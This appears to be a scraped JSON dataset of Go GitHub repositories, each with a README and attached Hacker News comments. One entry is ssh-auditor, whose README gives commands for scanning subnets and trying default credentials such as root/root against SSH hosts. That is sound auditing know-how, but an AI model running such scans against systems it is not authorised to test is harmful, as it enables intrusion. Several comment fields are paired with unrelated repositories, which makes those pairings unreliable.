{"data": [{"name": "ncsa/ssh-auditor", "link": "https://github.com/ncsa/ssh-auditor", "tags": ["ssh", "brute-force", "auditing", "security", "discover"], "stars": 558, "description": "The best way to scan for weak ssh passwords on your network", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/ncsa/ssh-auditor.svg?branch=master)](https://travis-ci.org/ncsa/ssh-auditor)\n\n# SSH Auditor\n\n\n## Features\n\nssh-auditor will automatically:\n\n* Re-check all known hosts as new credentials are added. It will only check the new credentials.\n* Queue a full credential scan on any new host discovered.\n* Queue a full credential scan on any known host whose ssh version or key fingerprint changes.\n* Attempt command execution as well as attempt to tunnel a TCP connection.\n* Re-check each credential using a per credential `scan_interval` - default 14 days.\n\n\nIt's designed so that you can run `ssh-auditor discover` + `ssh-auditor scan`\nfrom cron every hour to to perform a constant audit.\n\n## Demos\n\n# Earlier demo showing all of the features\n[![demo](https://asciinema.org/a/5rb3wv8oyoqzd80jfl03grrcv.png)](https://asciinema.org/a/5rb3wv8oyoqzd80jfl03grrcv?autoplay=1)\n\n# Demo showing improved log output\n\n[![demo](https://asciinema.org/a/F3fQYyJcieCS9Kfna6xWferjK.png)](https://asciinema.org/a/F3fQYyJcieCS9Kfna6xWferjK?autoplay=1)\n\n\n## Usage\n\n### Install\n\n $ brew install go # or however you want to install the go compiler\n $ go get github.com/ncsa/ssh-auditor\n\n### or Build from a git clone\n\n $ go build\n\n### Build a static binary including sqlite\n\n $ make static\n\n### Ensure you can use enough file descriptors\n\n $ ulimit -n 4096\n\n### Create initial database and discover ssh servers\n\n $ ./ssh-auditor discover -p 22 -p 2222 192.168.1.0/24 10.0.0.1/24\n\n### Add credential pairs to check\n\n $ ./ssh-auditor addcredential root root\n $ ./ssh-auditor addcredential admin admin\n $ ./ssh-auditor addcredential guest guest --scan-interval 1 #check this once per day\n\n### Try credentials against discovered hosts\n\n $ ./ssh-auditor scan\n\n### Output a report on what credentials worked\n\n $ ./ssh-auditor vuln\n\n### RE-Check credentials that worked\n\n $ ./ssh-auditor rescan\n\n### Output a report on duplicate key usage\n\n $ ./ssh-auditor dupes\n\n## TODO\n\n - [x] update the 'host changes' table\n - [x] handle false positives from devices that don't use ssh password authentication but instead use the shell to do it.\n - [x] variable re-check times - each credential has a scan_interval in days\n - [x] better support non-standard ports - discover is the only thing that needs to be updated, the rest doesn't care.\n - [ ] possibly daemonize and add an api that bro could hook into to kick off a discover as soon as a new SSH server is detected.\n - [ ] make the store pluggable (mysql, postgresql).\n - [x] differentiate between a failed password attempt and a failed connection or timeout. Mostly done. 
Things like fail2ban complicate this.\n - [x] add go implementations for the report sqlite3 command.\n\n## Report query.\n\nThe query that `ssh-auditor vuln` runs is:\n\n select\n hc.hostport, hc.user, hc.password, hc.result, hc.last_tested, h.version\n from\n host_creds hc, hosts h\n where\n h.hostport = hc.hostport\n and result!='' order by last_tested asc\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "satellity/satellity", "link": "https://github.com/satellity/satellity", "tags": ["forum", "golang", "discussion-forum", "discussion-board", "react", "postgres", "restful-api", "community"], "stars": 558, "description": "Yet another open source forum written in Golang, React and PostgreSQL.", "lang": "Go", "repo_lang": "", "readme": "## About Satellity (Pre Alpha)\n\nSatellity is an open-source forum.\n\n## Technology choices\n\n1. The front end and back end are separated, because Golang templates are quite awkward to use.\n2. The back end is written in Golang with no framework; individual packages are pulled in as needed.\n3. The front end is React; there are not many alternatives anyway, so the choice was fairly casual, and some React Native code may be added later.\n4. Data is stored in Postgres, an open-source relational database that is more than powerful enough.\n\n## Directory layout\n\n1. `./web` contains all the front-end code; see the scripts in `package.json`.\n2. `./internal` holds the Golang code; see the `Makefile` for how to run it.\n3. Everything else is deployment examples and configuration.\n\n## Running locally\n\n1. To run locally, prepare the database as described under `./internal/models`.\n2. In './web', `.env.example` needs a test `Github Client Id`; currently only GitHub login is supported.\n\n## Production deployment\n\nThe feature set is still incomplete, so this section is left empty for now...\n", "readme_type": "markdown", "hn_comments": "https://archive.is/XxrBPNice, however\u2026 that is not how orbiting works: https://imgur.com/a/yEWadl6Nice little easter egg: If you zoom into the center of the Earth you\u2019ll find the monkey puppet meme on a cube.Does anyone know if collisions between satellites are common? Seems like a ripe \"space\" for issues lolDoes anybody know why some Starlink satellites are lined up?Very, very cool.I know little about the subject matter but expected to see higher density around the equator. Unless I'm mistaken, geo-stationary satelites need to remain there(?)Another similar website: https://stuffin.spaceHere's a side-project I have been working on - a real-time 3D satellite tracking web app! 24k+ satellites from space-track.org, max fps & optimized performance! Move, zoom & select sats for info & orbit visualization. And more to come. A must-try for space fans!That's cool, but am I the only one that doesn't believe China?They forgot a comma between Likely and Shot.Checks out.
This source [0] describes the ACDL instrument as a 532 nm LIDAR, which is the correct shade of green. The NASA satellite also has a 532 nm LIDAR [1], so it also checks out that they might confuse the two.[0] https://assets.researchsquare.com/files/rs-1485263/v1_covere... (.pdf)[1] https://en.wikipedia.org/wiki/ICESat-2#Satellite_instrumentsI guess China's retaliating for shooting down their spy balloon by giving all of our cats the zoomies?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "icrowley/fake", "link": "https://github.com/icrowley/fake", "tags": [], "stars": 558, "description": "Fake data generator for Go (Golang)", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://img.shields.io/travis/icrowley/fake.svg?style=flat)](https://travis-ci.org/icrowley/fake) [![Godoc](http://img.shields.io/badge/godoc-reference-blue.svg?style=flat)](https://godoc.org/github.com/icrowley/fake) [![license](http://img.shields.io/badge/license-MIT-red.svg?style=flat)](https://raw.githubusercontent.com/icrowley/fake/master/LICENSE)\n\nFake\n====\n\nFake is a fake data generator for Go (Golang), heavily inspired by the forgery and ffaker Ruby gems.\n\n## About\n\nMost data and methods are ported from forgery/ffaker Ruby gems.\nFor the list of available methods please look at https://godoc.org/github.com/icrowley/fake.\nCurrently english and russian languages are available.\n\nFake embeds samples data files unless you call `UseExternalData(true)` in order to be able to work without external files dependencies when compiled, so, if you add new data files or make changes to existing ones don't forget to regenerate data.go file using `github.com/mjibson/esc` tool and `esc -o data.go -pkg fake data` command (or you can just use `go generate` command if you are using Go 1.4 or later).\n\n## Install\n\n```shell\ngo get github.com/icrowley/fake\n```\n\n## Import\n\n```go\nimport (\n \"github.com/icrowley/fake\"\n)\n```\n\n## Documentation\n\nDocumentation can be found at godoc:\n\nhttps://godoc.org/github.com/icrowley/fake\n\n## Test\nTo run the project tests:\n\n```shell\ncd test\ngo test\n```\n\n## Examples\n\n```go\nname := fake.FirstName()\nfullname := fake.FullName()\nproduct := fake.Product()\n```\n\nChanging language:\n\n```go\nerr := fake.SetLang(\"ru\")\nif err != nil {\n panic(err)\n}\npassword := fake.SimplePassword()\n```\n\nUsing english fallback:\n\n```go\nerr := fake.SetLang(\"ru\")\nif err != nil {\n panic(err)\n}\nfake.EnFallback(true)\npassword := fake.Paragraph()\n```\n\nUsing external data:\n\n```go\nfake.UseExternalData(true)\npassword := fake.Paragraph()\n```\n\n### Author\n\nDmitry Afanasyev,\nhttp://twitter.com/i_crowley\ndimarzio1986@gmail.com\n\n\n### Maintainers\n\nDmitry Moskowski\nhttps://github.com/corpix\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "santhosh-tekuri/jsonschema", "link": "https://github.com/santhosh-tekuri/jsonschema", "tags": ["golang", "json-schema", "jsonschema", "validator", "golang-library", "go", "draft4", "draft6", "draft7", "draft2019-09", "json", "validation", "draft2020-12"], "stars": 557, "description": "JSONSchema (draft 2020-12, draft 2019-09, draft-7, draft-6, draft-4) Validation using Go", "lang": "Go", "repo_lang": "", "readme": "# jsonschema 
v5.2.0\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![GoDoc](https://godoc.org/github.com/santhosh-tekuri/jsonschema?status.svg)](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5)\n[![Go Report Card](https://goreportcard.com/badge/github.com/santhosh-tekuri/jsonschema/v5)](https://goreportcard.com/report/github.com/santhosh-tekuri/jsonschema/v5)\n[![Build Status](https://github.com/santhosh-tekuri/jsonschema/actions/workflows/go.yaml/badge.svg?branch=master)](https://github.com/santhosh-tekuri/jsonschema/actions/workflows/go.yaml)\n[![codecov.io](https://codecov.io/github/santhosh-tekuri/jsonschema/coverage.svg?branch=master)](https://codecov.io/github/santhosh-tekuri/jsonschema?branch=master)\n\nPackage jsonschema provides json-schema compilation and validation.\n\n[Benchmarks](https://dev.to/vearutop/benchmarking-correctness-and-performance-of-go-json-schema-validators-3247)\n\n### Features:\n - implements\n [draft 2020-12](https://json-schema.org/specification-links.html#2020-12),\n [draft 2019-09](https://json-schema.org/specification-links.html#draft-2019-09-formerly-known-as-draft-8),\n [draft-7](https://json-schema.org/specification-links.html#draft-7),\n [draft-6](https://json-schema.org/specification-links.html#draft-6),\n [draft-4](https://json-schema.org/specification-links.html#draft-4)\n - fully compliant with [JSON-Schema-Test-Suite](https://github.com/json-schema-org/JSON-Schema-Test-Suite) (excluding some optional tests)\n - the list of excluded optional tests can be found in schema_test.go (variable [skipTests](https://github.com/santhosh-tekuri/jsonschema/blob/master/schema_test.go#L24))\n - validates schemas against meta-schema\n - full support of remote references\n - support of recursive references between schemas\n - detects infinite loops in schemas\n - thread-safe validation\n - rich, intuitive hierarchical error messages with json-pointers to exact location\n - supports output formats: flag, basic and detailed\n - supports enabling format and content assertions in draft2019-09 or above\n - change `Compiler.AssertFormat`, `Compiler.AssertContent` to `true`\n - compiled schema can be introspected.
easier to develop tools like generating go structs from a given schema\n - supports user-defined keywords via [extensions](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-Extension)\n - implements the following formats (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedFormat))\n - date-time, date, time, duration, period (supports leap-second)\n - uuid, hostname, email\n - ip-address, ipv4, ipv6\n - uri, uriref, uri-template (limited validation)\n - json-pointer, relative-json-pointer\n - regex, format\n - implements the following contentEncoding (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedContent))\n - base64\n - implements the following contentMediaType (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedContent))\n - application/json\n - can load from files/http/https/[string](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-FromString)/[]byte/io.Reader (supports [user-defined](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5/#example-package-UserDefinedLoader))\n\n\nsee examples in [godoc](https://pkg.go.dev/github.com/santhosh-tekuri/jsonschema/v5)\n\nThe schema is compiled against the version specified in the `$schema` property.\nIf the \"$schema\" property is missing, it uses the latest draft currently implemented\nby this library.\n\nYou can force a specific version to be used when `$schema` is missing, as follows:\n\n```go\ncompiler := jsonschema.NewCompiler()\ncompiler.Draft = jsonschema.Draft4\n```\n\nThis package supports loading json-schema from filePath and fileURL.\n\nTo load json-schema from an HTTP URL, add the following import:\n\n```go\nimport _ \"github.com/santhosh-tekuri/jsonschema/v5/httploader\"\n```\n\n## Rich Errors\n\nThe ValidationError returned by the Validate method contains detailed context to understand why and where the error is.\n\nschema.json:\n```json\n{\n \"$ref\": \"t.json#/definitions/employee\"\n}\n```\n\nt.json:\n```json\n{\n \"definitions\": {\n \"employee\": {\n \"type\": \"string\"\n }\n }\n}\n```\n\ndoc.json:\n```json\n1\n```\n\nassuming `err` is the ValidationError returned when `doc.json` is validated with `schema.json`,\n```go\nfmt.Printf(\"%#v\\\\n\", err) // using %#v prints errors hierarchy\n```\nPrints:\n```\n[I#] [S#] doesn't validate with file:///Users/santhosh/jsonschema/schema.json#\n [I#] [S#/$ref] doesn't validate with 'file:///Users/santhosh/jsonschema/t.json#/definitions/employee'\n [I#] [S#/definitions/employee/type] expected string, but got number\n```\n\nHere `I` stands for instance document and `S` stands for schema document. \nThe json-fragments that caused error in instance and schema documents are represented using json-pointer notation.
\nNested causes are printed with indent.\n\nTo output `err` in `flag` output format:\n```go\nb, _ := json.MarshalIndent(err.FlagOutput(), \"\", \" \")\nfmt.Println(string(b))\n```\nPrints:\n```json\n{\n \"valid\": false\n}\n```\nTo output `err` in `basic` output format:\n```go\nb, _ := json.MarshalIndent(err.BasicOutput(), \"\", \" \")\nfmt.Println(string(b))\n```\nPrints:\n```json\n{\n \"valid\": false,\n \"errors\": [\n {\n \"keywordLocation\": \"\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#\",\n \"instanceLocation\": \"\",\n \"error\": \"doesn't validate with file:///Users/santhosh/jsonschema/schema.json#\"\n },\n {\n \"keywordLocation\": \"/$ref\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#/$ref\",\n \"instanceLocation\": \"\",\n \"error\": \"doesn't validate with 'file:///Users/santhosh/jsonschema/t.json#/definitions/employee'\"\n },\n {\n \"keywordLocation\": \"/$ref/type\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/t.json#/definitions/employee/type\",\n \"instanceLocation\": \"\",\n \"error\": \"expected string, but got number\"\n }\n ]\n}\n```\nTo output `err` in `detailed` output format:\n```go\nb, _ := json.MarshalIndent(err.DetailedOutput(), \"\", \" \")\nfmt.Println(string(b))\n```\nPrints:\n```json\n{\n \"valid\": false,\n \"keywordLocation\": \"\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#\",\n \"instanceLocation\": \"\",\n \"errors\": [\n {\n \"valid\": false,\n \"keywordLocation\": \"/$ref\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/schema.json#/$ref\",\n \"instanceLocation\": \"\",\n \"errors\": [\n {\n \"valid\": false,\n \"keywordLocation\": \"/$ref/type\",\n \"absoluteKeywordLocation\": \"file:///Users/santhosh/jsonschema/t.json#/definitions/employee/type\",\n \"instanceLocation\": \"\",\n \"error\": \"expected string, but got number\"\n }\n ]\n }\n ]\n}\n```\n\n## CLI\n\nto install `go install github.com/santhosh-tekuri/jsonschema/cmd/jv@latest`\n\n```bash\njv [-draft INT] [-output FORMAT] [-assertformat] [-assertcontent] []...\n -assertcontent\n \tenable content assertions with draft >= 2019\n -assertformat\n \tenable format assertions with draft >= 2019\n -draft int\n \tdraft used when '$schema' attribute is missing. valid values 4, 5, 7, 2019, 2020 (default 2020)\n -output string\n \toutput format. valid values flag, basic, detailed\n```\n\nif no `` arguments are passed, it simply validates the ``. \nif `$schema` attribute is missing in schema, it uses latest version. this can be overridden by passing `-draft` flag\n\nexit-code is 1, if there are any validation errors\n\n`jv` can also validate yaml files. It also accepts schema from yaml files.\n\n## Validating YAML Documents\n\nsince yaml supports non-string keys, such yaml documents are rendered as invalid json documents. \n\nmost yaml parser use `map[interface{}]interface{}` for object, \nwhereas json parser uses `map[string]interface{}`. \n\nso we need to manually convert them to `map[string]interface{}`. \nbelow code shows such conversion by `toStringKeys` function.\n\nhttps://play.golang.org/p/Hhax3MrtD8r\n\nNOTE: if you are using `gopkg.in/yaml.v3`, then you do not need such conversion. 
since this library\nreturns `map[string]interface{}` if all keys are strings.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "golang/build", "link": "https://github.com/golang/build", "tags": [], "stars": 557, "description": "[mirror] Go's continuous build and release infrastructure (no stability promises)", "lang": "Go", "repo_lang": "", "readme": "// Copyright 2017 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n//go:build ignore\n// +build ignore\n\n// The update-readmes.go tool creates or updates README.md files in\n// the golang.org/x/build tree. It only updates files if they are\n// missing or were previously generated by this tool. If the file\n// contains a \"\" comment,\n// the tool leaves content in the rest of the file unmodified.\n//\n// The auto-generated Markdown contains the package doc synopsis\n// and a link to pkg.go.dev for the API reference.\npackage main\n\nimport (\n\t\"bytes\"\n\t\"fmt\"\n\t\"go/build\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"os\"\n\t\"path/filepath\"\n\t\"strings\"\n)\n\nfunc main() {\n\troot, err := build.Import(\"golang.org/x/build\", \"\", build.FindOnly)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to find golang.org/x/build root: %v\", err)\n\t}\n\terr = filepath.Walk(root.Dir, func(path string, fi os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !fi.IsDir() {\n\t\t\treturn nil\n\t\t}\n\t\trest := strings.TrimPrefix(strings.TrimPrefix(path, root.Dir), \"/\")\n\t\tswitch rest {\n\t\tcase \"env\", \"version\", \"vendor\":\n\t\t\treturn filepath.SkipDir\n\t\t}\n\t\tpkgName := \"golang.org/x/build/\" + filepath.ToSlash(rest)\n\n\t\tbctx := build.Default\n\t\tbctx.Dir = path // Set Dir since some x/build packages are in nested modules.\n\t\tpkg, err := bctx.Import(pkgName, \"\", 0)\n\t\tif err != nil {\n\t\t\t// Skip.\n\t\t\treturn nil\n\t\t}\n\t\tif pkg.Doc == \"\" {\n\t\t\t// There's no package comment, so don't create an empty README.\n\t\t\treturn nil\n\t\t}\n\t\tif _, err := os.Stat(filepath.Join(pkg.Dir, \"README\")); err == nil {\n\t\t\t// Directory has exiting README; don't touch.\n\t\t\treturn nil\n\t\t}\n\t\treadmePath := filepath.Join(pkg.Dir, \"README.md\")\n\t\texist, err := ioutil.ReadFile(readmePath)\n\t\tif err != nil && !os.IsNotExist(err) {\n\t\t\t// A real error.\n\t\t\treturn err\n\t\t}\n\t\tconst header = \"Auto-generated by x/build/update-readmes.go\"\n\t\tif len(exist) > 0 && !bytes.Contains(exist, []byte(header)) {\n\t\t\treturn nil\n\t\t}\n\t\tvar footer []byte\n\t\tif i := bytes.Index(exist, []byte(\"\")); i != -1 {\n\t\t\tfooter = exist[i:]\n\t\t}\n\t\tnewContents := []byte(fmt.Sprintf(`\n\n[![Go Reference](https://pkg.go.dev/badge/%s.svg)](https://pkg.go.dev/%s)\n\n# %s\n\n%s\n%s`, header, pkgName, pkgName, pkgName, pkg.Doc, footer))\n\t\tif bytes.Equal(exist, newContents) {\n\t\t\treturn nil\n\t\t}\n\t\tif err := ioutil.WriteFile(readmePath, newContents, 0644); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlog.Printf(\"Wrote %s\", readmePath)\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}\n", "readme_type": "text", "hn_comments": "How to build production grade WebServices with gRPC/OpenAPI and GolangBBC Basic and Econet.Take a look at whats up. I would use something like erlang.The front end is less of a concern.But in general the site is huge (at least 500K machines).I'd use shell scripts... 
Bash is the only way to ensure stability and backwards compatibly so that aliens can see the \"public (yet commercially private) town square\".Switch workflow orchestration to temporal!Just do it in with react/MERN and get it done with quickly. A twitter clone MVP can be made in a day. It\u2019s one of the most basic tutorials.It will be roughly like Mastodon, but for large files, I will use ipfs or BitTorrent.I like the idea of bluesky where user data stay in version-controlled repos and can be migrated between servers. But I guess I will use crdt for that.I will use rust for the backend, VUE for the frontend.I see (on the architecture page) Slashbase uses SQLite to store it's own app data, but it doesn't support SQLite as the target database? Is there some particular reason?Hey!Just a few weeks ago I was searching for such a solution (IDE for databases in browsers without viz) and I found a bit old but still very good and simple to use project https://github.com/sqlpad/sqlpad/\nI set it up for our company yesterday and it works greatDo you have plans for extending it to other databases in the future (eg. MySQL)?I just want to add a plug for the very awesome DBeaver, a cross platform native GUI front end which supports pretty much every major database format.I use it every day on Windows and Linux for viewing and editing SQLite and PSQL databases. I've also used it to dump and restore tables in a pinch. It supports dumping and importing tables in a multitude of formats, including JSON and plain SQL statements.Looks super useful, and brings me back to the days of installing phpMyAdmin on all my serversBrowsing through the docs, is there some kind of authentication that could be done in app? Would need to figure out how to keep things protected and only accessible by a few people.Looks promising. There are a couple of things that worries me though. (I haven't tried it yet, only skimmed the docs)1. Telemetry needs to be opt-in during install.\n2. The roles are weird, why would a developer need write access by default? That's just a recipe for disaster. Would be better to default to read-only in all roles and allow upgrading to write permission as an active choice. \n3. There needs to be a clear way to distinguish between prod/staging. I like clients where you can change the background color for different connections, eg screaming red for prod.Good luck, keep up the good workVery interesting project. Looks like you are going in the direction of an open source PopSQL instead of something like dbeaver and I really like it.very cool :) love the docsmay i ask why you started working on such a project? am interested in motivations and what gaps you see in the marketSince this is an IDE I wonder what your idea is for version control? In my opinion a database should be considered a deployment container, not a place where you\u2019d normally do live development.What got you interested in building something like this?Doing well at interviews has low correlation with being good at the job, simple as that.I was going to comment something about how with modern tooling a lot of people (including me) can write working apps without being too advanced but from your description it sounds like you know quite a lot.I don't think you have to take the label \"bad programmer\" because you don't ace job interviews. 
Those are contrived games anyway, if you practice you can learn to ace them but from your position it doesn't sound nessecary.I'll also throw out that it's not binary in the other direction either.There is always more to learn and as long as it's still fun I find that reading one more technical book usually does add value somewhere I wasn't expecting.> I understands the usage of Hash / Map instead of searching arrays and many other small things that actually enhance the code performanceI would consider this an assumed skill for any developer with a college degree. It\u2019s basically the point of the entire Data Structures class, which is a degree requirement.if what u say is truth then you are undoubtedly a good programmer - pragmatic people who are thoughtful of others (users and maintainers) are clearly good.this is the bizarre thing - these are qualities that actually make a good product developer, but many companies pretend that they are hiring people who will be coming up with new algorithms and not just make db records when someone clicks or submits a form.I feel the same way. I hate interviewing because I usually need to study for stuff I won't use. I also didn't do CS in college and some times I feel like this is the missing point in my career.Some companies have a more straight forward interview process. Try to stay away from big companies. There are startups paying very well.>I started as a hacker, reverse engineeringthis is the key point which makes you good. you always think as a hacker and that's why you write good code.> Still I will score quite low in job interview questions ...> I never \"studied\" computer science in a regular way,You never really mentioned algorithms, and your only mention of data structures was \"usage of [hash tables] instead of searching arrays and many other small things that actually enhance the code performance.\"While you don't need them all the time, a good understanding of common data structures and algorithms will make you a better engineer, and I suspect this is the weakness they're seeing.I wanted to give you a completely objective opinion, so I went from gematrix.org > www.c2kb.com > 9gagrss.xyz and based on that and your user name I found this: https://github.com/caviv/9gagerOne thing, I think, you should be really careful about is how you handle user inputs, e.g. this line:\nhttps://github.com/caviv/9gager/blob/20ccaaf649af525fc7a0c1d...I validated this on the live site as well, and it was really easy to insert any kind of HTML through the `channel` param. This is called XSS or Cross-Site Scripting.Also, you seem to regularly commit code that includes database connection information (I hope it is not active anymore, or at least not reachable from the outside internet), e.g.:\nhttps://github.com/caviv/9gager/commit/bcc0b91eb8638835c1557...Now, to be clear, this doesn't necessarily make you a bad programmer per se. But in my eyes, your claims of being \"actually really good\" seem to be over the top, and what I see is that you still have a lot to learn about the web and especially about security.While not as profound as you, I think I'm a decent developer. The caveat being that I don't work in software development, but in a role that's on the business side with a mix of management, software engineering, a bit of maths and data engineering and analysis.A few years ago I was applying to a well-known consulting firm, a role in data analytics. 
I got rejected due to \"not knowing SQL\" (which at that point I've used professionally for 8 years) and they hired someone else. A few months later, the same company made me an offer for another team in a more business driven role. I've ended up as a lead solution architect for a pretty involved WASM-based product with them and managing the guy they hired instead of me before. The guy couldn't code a for-loop in Python and I ended up doing all the engineering work for him until we could offboard him.Moral of the story: perceptions, culture, and internal team politics might play a way bigger role in seeing your value as an engineer than we might acknowledge.I guess I'm pretty bad.Lots of folks, that I know aren't especially good (because I've looked at their work), take great joy in telling me how bad I am, which they seem to know, without looking at any of my work, so I guess I'm just terrible.That's one reason I don't bother being competitive. \"Good\" is in the eye of the beholder.If someone comments their code, that can be \"good,\" for some, and \"bad,\" for others.If someone adds extensive, nested error handling, that's \"good,\" for some, and \"bad,\" for others.And so on...Usually, both sides have quite valid points.I just do things the way that I do them. Seems to work.WFM, YMMV.vague question, depends on what metrics you want to measure yourself. effective on what, generating revenue? creating impact to the world? you can answer that.A good number of people conducting interviews are never given any formal training. They may be biased against you before you even enter the room. Fortunately the demand for programmers is still good so take feedback from the interview process with a grain of salt.There are great websites where you can practice technical interview questions. Leetcode, etc. When I'm getting ready for interviews I keep a practice journal and build a deck of flashcards. I use the practice journal to categorize the problems I work on, how long it took me, how many times I've practiced that problem, notes on my solutions, etc. I try to cover the 5 most common solution types: _depth first search_, _breadth first search_, _binary search_, _two pointers_, and _dynamic programming_. Review the most common data structures and their look up times. And I use the flashcards to test my reading comprehension: I put the problem description on the card and the answer is which algorithm should be used to solve it.This gets me through 90% of interview exercises. Occasionally you get hit with a smart aleck who will try to blind-side you with an optimization problem after a hard dynamic algorithm. It's good to have some breadth in your knowledge of special data structures like heaps, k-d trees, and the like but I wouldn't waste too much time on them unless you know ahead of time that the company you really, really want to work for is likely to ask these sorts of questions. I try to book those companies for the end of a round so that I have time to warm up before I get to the ones I really want (and need to practice harder for).I don\u2019t know about your programming skills, but one of the most important and difficult things about programming is communication, and the grammar probably isn\u2019t helping.Good to know. I have pretty high opinion of myself too.lol just want to add that KISS stands for 'Keep it simple, stupid'I have done countless technical interviews and I can already tell you how your interview is going to go based on your comments here. 
You are confusing programmer/developer/knowing DSL and being a good candidate. You might be a good problem solver as well, but details matter. You can't simply gloss over them. A crudely solved problem might as well be not solved at all.Tech interview questions with leet code is the equivalent of standardized tests (SAT, ACT) for admissions to college/university. Neither are anything like what is required of you once you are accepted.I'd take people that have initiative, want to learn and are coach-able over someone that can excel at taking tests.You're \"expected\" to study for job interview questions. It's more a measure of willingness to jump through hoops than your competence. Developer interview questions in general has little to do with what you'll do as a developer, and what you're expected to know as a developer.Do you have to be good at everything? It is an unreasonable expectation. It is better to know a lot of stuff a little and some things very, very well.Do you have to get every job? You do not. You just need to find one that suits you and where you will be successful, and everything else is meaningless. But don't completely reject the feedback -- try to understand what is causing you to be unsuccessful in interview to get better at it and hopefully improve your chances of getting the job you want.Interview questions (and I say this being an interviewer and having interviewed thousands of candidates) do not tell if you are a good programmer though they can tell if you are a bad one. Even then, one has to recognise that selection of questions is going to shape the definition of what good and bad is.There is also no single definition of a good and bad developer is. Different types of jobs require different types of people. I have hired for positions where I needed a dull, ambitionless person that can take boring tasks day after day without complaint. If I saw a candidate with even a hint of ambition I would immediately tell them no because there was no way they would stay on the job for long.My advices:- Find your niche, find what you are good at AND gives you joy or at least satisfaction that you know you can be doing well and have others at least potentially recognise you for this.- Know your limits. Do not try to get hired over your abilities unless you do it with intention of stressing yourself to get better in the end (know why you are doing it).- Set up a periodic review of what you are doing, what is not going well and what you can do to be better at your job.I, myself, found that I am perfectionist and able to write perfect code, fast, reliable, but with the downside that it takes forever to get anything done.I decided early on that I will be working on projects that benefit from being perfectionist and that I will immediately reject any project where there just isn't any business case of polishing your code. So no websites, no UIs, no startups, etc. I am working on backends for critical corporate systems.You are better than many others.\nThe same for me, but maybe it's not enough to became rich & famous.> All of this together allowed me to build and sell already two startups. Develop and maintain easily many web sites and SaaS which creates me nice passive incomeA successful entrepreneur, perhaps, but not necessarily a good programmer.There's really nothing wrong with being dead average. The interview process is backwards in this industry anyway. No need to worry. It sounds like you're doing fine.Lots of folks are good at doing the job but bad at interviewing for jobs. 
Interview prep is a massive industry.Like with any skill, practice helps. It sounds like you dont really care that you dont do exceptionally well at interview. But if you wanted to improve that skill you could focus some time on it.Think of another skill you only use once every year or two. You are not going to be fantastic at it. I've played a lot of basketball in my life but only play in games ever year or two when I happen to be with folks who have a regular game. Now I'm in pretty decent shape so in general I do okay but the actual skills of playing basketball are rusty so I'm going to be a 5-7 out of 10. If I played basketball everyday I would probably be a 7-8 out of ten.The same goes for interviewing. You are coding regularly so you have some of the prerequisites for doing well in interviews but without practicing typical interview type questions you will not excel at them. If you did 100 interviews over the next year I'm sure you would start to see patterns, improve on your weaknesses, and be closer to a 10 than a 5. It's a skill you have to work on outside of just coding if you want to be a great interviewee.I went on an interview some years ago and was asked how I'd architect a certain situation with Models and Controllers. I spent some time discussing why that wasn't the right solution for what they were trying to do, and they said thanks but no thanks.Now to be fair to them, I was asked to do a certain task and I failed to do that task. It's pretty cut and dry.But I also walked away glad they turned me down, because if they're going to try and force me to do something a specific way when that way is inefficient, or troublesome or just plain not the best answer, then I wouldn't really want to be working there anyway.Reading through your post, I am noticing some trivial English mistakes that are common to non-native speakers.It's worth knowing that while you have successfully articulated everything, some people will still see your mistakes as red flags for future communication. Some might even assume that you will be making trivial code mistakes, too; despite there being no evidence of that.That kind of prejudice is common, and difficult to confront.There is no real need for you to improve your English skills: your writing isn't ambiguous or missing anything. Even so, it's worth recognizing the social dynamic that is likely to happen, and how that affects you.> I know how to KISS (Keep it stupid and simple)KISS is \u201ckeep it simple, stupid\u201d: https://en.wikipedia.org/wiki/KISS_principleYou are a good programmer. Period.I can tell you I\u2019ve received feedback on take home coding tests of \u201cOutstanding\u201d and \u201cUnreadable\u201d on the same day. Some people are never going to like your code.With that said, coding interviews are a skill and like any skill it can be learnt. Keep going, read Cracking The Coding Interview, practice leetcode and make notes of every question you feel you answered badly and make sure the next person who asks it gets a better answer. I understands Object Oriented correctly and knows\n where to use it and how and when to avoid it\n\nLiterally nobody \"knows\" this for every case, there's not a right answer: OO is a philosophy not an instruction manual. \"Good programmers\" accept there's ambiguity.Your experience is very commonTake home projects are much better for me than interview problems, but take home projects are unnecessarily complex and time consuming. 
